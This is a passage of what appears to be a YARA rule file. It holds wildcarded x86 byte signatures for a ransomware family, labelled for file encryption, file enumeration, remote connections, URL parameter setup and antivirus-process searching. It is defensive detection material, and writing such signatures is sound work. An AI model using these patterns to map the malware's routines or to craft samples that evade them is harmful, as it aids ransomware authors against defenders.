6A ?? 8D 45 ?? 50 FF B6 ?? ?? ?? ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 85 - C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 3B 86 ?? ?? ?? ?? 8B 55 ?? 6A - ?? 59 0F 42 F9 83 7D ?? ?? 8D 8D ?? ?? ?? ?? 0F 45 7D ?? 01 86 ?? ?? ?? ?? 89 7D ?? - 83 96 ?? ?? ?? ?? ?? 8B 45 ?? 50 FF 75 ?? 89 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 59 59 33 - C9 F7 D8 41 99 51 6A ?? 52 50 53 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? FF 75 - ?? 53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 75 ?? 8B 7D ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? - 8D 45 ?? 50 57 56 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 75 ?? 8B 7D ?? 33 C0 40 01 86 - ?? ?? ?? ?? 83 96 ?? ?? ?? ?? ?? EB ?? 33 C0 8D 78 ?? 85 FF 0F 84 ?? ?? ?? ?? 83 7D - ?? ?? 74 ?? 6A ?? 6A ?? 0F 57 C0 66 0F 13 45 ?? FF 75 ?? FF 75 ?? 53 FF 15 ?? ?? ?? - ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 56 53 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B F8 89 7D ?? - E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 DB 0F 84 ?? ?? ?? ?? - 85 FF 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ?? 83 65 ?? ?? 83 65 ?? ?? 8B 35 ?? - ?? ?? ?? FF D6 8D 0C 45 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? 8B F8 33 C0 40 83 67 ?? - ?? 88 07 FF D6 FF 75 ?? 03 C0 89 47 ?? FF D6 8D 04 45 ?? ?? ?? ?? 50 FF 75 ?? 8D 47 - ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF 75 ?? FF D6 8D 04 45 ?? ?? ?? ?? 50 57 8D 45 - ?? 50 53 FF 15 ?? ?? ?? ?? 8B 4D ?? 89 01 8B CF E8 ?? ?? ?? ?? 8B 7D ?? 8B 45 ?? FF - 70 ?? FF 70 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B C7 5F 5E 5B - 8B E5 5D C3 - } - $remote_connection_v5 = { - 55 8B EC 83 EC ?? 53 8B 1D ?? ?? ?? ?? 56 8B F1 57 83 7E ?? ?? 74 ?? FF 76 ?? FF D3 - 8B CE E8 ?? ?? ?? ?? 33 FF 57 57 6A ?? 57 57 FF 75 ?? FF 75 ?? FF 76 ?? FF 15 ?? ?? - ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? - ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 75 ?? 8B F0 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? - 83 C4 ?? B8 ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 44 C8 57 51 57 57 68 - ?? ?? ?? ?? 56 8B 75 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? FF - 75 ?? FF 75 ?? FF 75 ?? FF 75 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 33 FF 47 EB ?? FF - 15 ?? ?? ?? ?? 8B 45 ?? 50 FF D3 56 FF D3 8D 4D ?? E8 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B - E5 5D C2 - } - $remote_connection_v5_0_1 = { - 55 8B EC 83 EC ?? 53 8B 1D ?? ?? ?? ?? 56 8B F1 57 83 7E ?? ?? 74 ?? FF 76 ?? FF D3 - 8B CE E8 ?? ?? ?? ?? 33 FF 57 57 6A ?? 57 57 FF 75 ?? FF 75 ?? FF 76 ?? FF 15 ?? ?? - ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? - ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 75 ?? 8B F0 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? - 83 C4 ?? B8 ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 44 C8 57 51 57 57 68 - ?? ?? ?? ?? 56 8B 75 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? FF - 75 ?? FF 75 ?? FF 75 ?? FF 75 ?? 50 FF 15 ?? ?? ?? ?? 33 C9 41 85 C0 8B 45 ?? 0F 45 - F9 50 FF D3 56 FF D3 8D 4D ?? E8 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B E5 5D C2 - } - $url_parameters_setup_v5 = { - 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? - 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? - 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 - ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 - ?? 8B 45 ?? 8D 8C 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? - 75 ?? 6A ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 - ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF - 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF - 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? FF 35 - ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 - ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? - D1 E0 A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? D1 E0 8B D0 8B 0D ?? ?? ?? - ?? E8 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A - ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 68 - ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? - ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? - ?? 73 ?? 83 65 ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 6A - ?? FF 75 ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 15 ?? ?? - ?? ?? 83 7D ?? ?? 74 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8B E5 5D C3 - } - $url_parameters_setup_v5_0_1 = { - 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? - 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? - 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 - ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 - ?? 8B 45 ?? 8D 8C 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? - 75 ?? 6A ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 - ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF - 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF - 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? FF 35 - ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 - ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? - D1 E0 A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? D1 E0 8B D0 8B 0D ?? ?? ?? - ?? E8 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A - ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 68 - ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? - ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? - ?? 73 ?? 83 65 ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 6A - ?? FF 75 ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 15 ?? ?? - ?? ?? 83 7D ?? ?? 74 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8B E5 5D C3 - } - $crypt_files_v5_0_1 = { - 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8B D9 89 55 ?? 33 FF 89 5D ?? 21 7D ?? B9 ?? ?? - ?? ?? 89 7D ?? E8 ?? ?? ?? ?? 8B F0 33 C0 89 75 ?? 85 F6 0F 84 ?? ?? ?? ?? 50 68 ?? - ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 75 ?? 33 C0 - 50 68 ?? ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B D8 83 FB - ?? 0F 84 ?? ?? ?? ?? 8B 7D ?? FF 77 ?? FF 77 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 6A - ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 8D 45 ?? 50 68 - ?? ?? ?? ?? 56 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 81 BE ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? - 81 BE ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? FF 77 ?? FF 77 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? - ?? 53 FF 15 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 6A ?? 6A ?? 0F 57 - C0 66 0F 13 45 ?? FF 75 ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? FF 75 ?? 83 65 ?? ?? 8D 55 - ?? 56 8D 4D ?? E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 6A ?? 58 C6 45 ?? ?? 48 75 ?? 51 68 - ?? ?? ?? ?? 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 8B 8E ?? ?? - ?? ?? 83 65 ?? ?? 83 65 ?? ?? 41 89 45 ?? 8B 45 ?? 89 45 ?? E8 ?? ?? ?? ?? 8B 8E ?? - ?? ?? ?? 83 C1 ?? 89 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 33 FF 6A ?? 8D 45 ?? 50 FF B6 ?? - ?? ?? ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 - ?? ?? ?? ?? 3B 86 ?? ?? ?? ?? 8B 55 ?? 6A ?? 59 0F 42 F9 83 7D ?? ?? 8D 8D ?? ?? ?? - ?? 0F 45 7D ?? 01 86 ?? ?? ?? ?? 89 7D ?? 83 96 ?? ?? ?? ?? ?? 8B 45 ?? 50 FF 75 ?? - 89 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 59 59 33 C9 F7 D8 41 99 51 6A ?? 52 50 53 FF 15 ?? - ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 75 - ?? 8B 7D ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 57 56 53 FF 15 ?? ?? ?? ?? 85 - C0 74 ?? 8B 75 ?? 8B 7D ?? 33 C0 40 01 86 ?? ?? ?? ?? 83 96 ?? ?? ?? ?? ?? EB ?? 33 - C0 8D 78 ?? 85 FF 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 6A ?? 6A ?? 0F 57 C0 66 0F 13 - 45 ?? FF 75 ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 56 53 - FF 15 ?? ?? ?? ?? 8B 4D ?? 8B F8 89 7D ?? E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B - CE E8 ?? ?? ?? ?? 85 DB 0F 84 ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? - FF 75 ?? 83 65 ?? ?? 83 65 ?? ?? 8B 35 ?? ?? ?? ?? FF D6 8D 0C 45 ?? ?? ?? ?? E8 ?? - ?? ?? ?? FF 75 ?? 8B F8 33 C0 40 83 67 ?? ?? 88 07 FF D6 FF 75 ?? 03 C0 89 47 ?? FF - D6 8D 04 45 ?? ?? ?? ?? 50 FF 75 ?? 8D 47 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF 75 - ?? FF D6 8D 04 45 ?? ?? ?? ?? 50 57 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 8B 4D ?? 89 01 - 8B CF E8 ?? ?? ?? ?? 8B 7D ?? 8B 45 ?? FF 70 ?? FF 70 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? - ?? ?? 53 FF 15 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B E5 5D C3 - } - $find_files_v5_0_1 = { - 55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 33 FF 89 54 24 ?? 8B F1 89 7C 24 ?? 39 - 7D ?? 75 ?? 8D 54 24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 85 C0 75 ?? 85 DB 75 ?? 33 C0 E9 - ?? ?? ?? ?? 33 DB 43 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 66 83 3E ?? 74 ?? 8D 54 24 ?? - 89 7C 24 ?? 8B CE E8 ?? ?? ?? ?? 89 44 24 ?? 39 7C 24 ?? 75 ?? 56 FF 15 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 56 8D 04 46 89 44 24 ?? FF 15 ?? ?? ?? ?? 6A ?? 57 57 8D 44 24 ?? 50 - 6A ?? 56 FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 33 D2 89 44 24 ?? 66 89 11 83 F8 ?? 75 ?? BF - ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 - ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 44 24 ?? 50 56 FF - 15 ?? ?? ?? ?? F6 44 24 ?? ?? 74 ?? 85 DB 74 ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? - 85 C0 74 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 8B 54 24 ?? 8B CE E8 ?? ?? ?? - ?? EB ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 57 EB ?? FF 74 24 ?? 8D 54 24 ?? 8B CE - E8 ?? ?? ?? ?? 59 8B 44 24 ?? 33 C9 66 89 08 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? - ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? - ?? ?? 8B C7 5F 5E 5B 8B E5 5D C3 - } - $search_antivirus_processes_v5_0_1 = { - 55 8B EC 83 EC ?? 53 56 8B 35 ?? ?? ?? ?? BB ?? ?? ?? ?? 57 6A ?? 53 68 ?? ?? ?? ?? - 33 C0 50 FF D6 8B 7D ?? 6A ?? 53 6A ?? 33 DB 89 07 53 C7 45 ?? ?? ?? ?? ?? C7 45 ?? - ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? - ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? - ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? - ?? ?? ?? ?? FF D6 8B F0 85 F6 75 ?? 33 C0 E9 ?? ?? ?? ?? 53 6A ?? C7 06 ?? ?? ?? ?? - FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 75 ?? 68 ?? ?? ?? ?? 53 56 FF 15 ?? ?? ?? ?? EB - ?? 56 33 C9 89 5D ?? 50 89 5D ?? 89 4D ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? - 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 33 C0 8D 4E ?? 89 45 ?? 51 FF 74 85 ?? FF 15 ?? ?? ?? - ?? 85 C0 74 ?? 8B 45 ?? 8D 4E ?? 40 89 45 ?? 83 F8 ?? 72 ?? EB ?? 33 C0 39 45 ?? 8D - 58 ?? 8D 46 ?? 50 FF 37 75 ?? FF 15 ?? ?? ?? ?? EB ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? - ?? FF 37 FF 15 ?? ?? ?? ?? FF 45 ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 6A ?? 8D - 0C 41 8B 45 ?? 81 F9 ?? ?? ?? ?? 89 4D ?? 59 0F 47 C1 89 45 ?? 56 FF 75 ?? FF 15 ?? - ?? ?? ?? 85 C0 74 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 85 DB 74 ?? 8B 07 - 33 C9 66 39 08 74 ?? 50 FF 15 ?? ?? ?? ?? 8B 0F 33 D2 66 89 54 41 ?? 8B 45 ?? 8B 4D - ?? 89 08 68 ?? ?? ?? ?? 33 C0 50 56 8B 35 ?? ?? ?? ?? FF D6 FF 75 ?? FF 15 ?? ?? ?? - ?? 85 DB 75 ?? 68 ?? ?? ?? ?? 33 C0 50 FF 37 FF D6 8B C3 5F 5E 5B 8B E5 5D C2 - } - $set_url_parameters_v5_0_2 = { - 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? - 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? - 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 - ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 - ?? 8B 45 ?? 8D 8C 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? - 75 ?? 6A ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 - ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF - 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF - 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? FF 35 - ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 - ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? - D1 E0 A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? D1 E0 8B D0 8B 0D ?? ?? ?? - ?? E8 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A - ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 68 - ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? - ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? - ?? 73 ?? 83 65 ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 6A - ?? FF 75 ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 15 ?? ?? - ?? ?? 83 7D ?? ?? 74 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8B E5 5D C3 - } - $set_url_parameters_v5_0_3 = { - 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? - 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? - 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 - ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 - ?? 8B 45 ?? 8D 8C 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? - 75 ?? 6A ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 - ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF - 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF - 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? FF 35 - ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 - ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? - D1 E0 A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? D1 E0 8B D0 8B 0D ?? ?? ?? - ?? E8 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? - ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? - ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? - ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 73 ?? 83 65 ?? ?? 68 ?? ?? ?? ?? 8D - 45 ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 6A ?? FF 75 ?? 6A ?? 6A ?? FF 15 ?? ?? ?? - ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? - 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 6A ?? FF 75 ?? FF 15 ?? ?? - ?? ?? 83 7D ?? ?? 74 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8B E5 5D C3 - } - $search_antivirus_processes_v5_0_2 = { - 55 8B EC 83 EC ?? 53 56 8B 35 ?? ?? ?? ?? BB ?? ?? ?? ?? 57 6A ?? 53 68 ?? ?? ?? ?? - 33 C0 50 FF D6 8B 7D ?? 6A ?? 53 6A ?? 33 DB 89 07 53 C7 45 ?? ?? ?? ?? ?? C7 45 ?? - ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? - ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? - ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? - ?? ?? ?? ?? FF D6 8B F0 85 F6 75 ?? 33 C0 E9 ?? ?? ?? ?? 53 6A ?? C7 06 ?? ?? ?? ?? - FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 75 ?? 68 ?? ?? ?? ?? 53 56 FF 15 ?? ?? ?? ?? EB - ?? 56 33 C9 89 5D ?? 50 89 5D ?? 89 4D ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? - 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 33 C0 8D 4E ?? 89 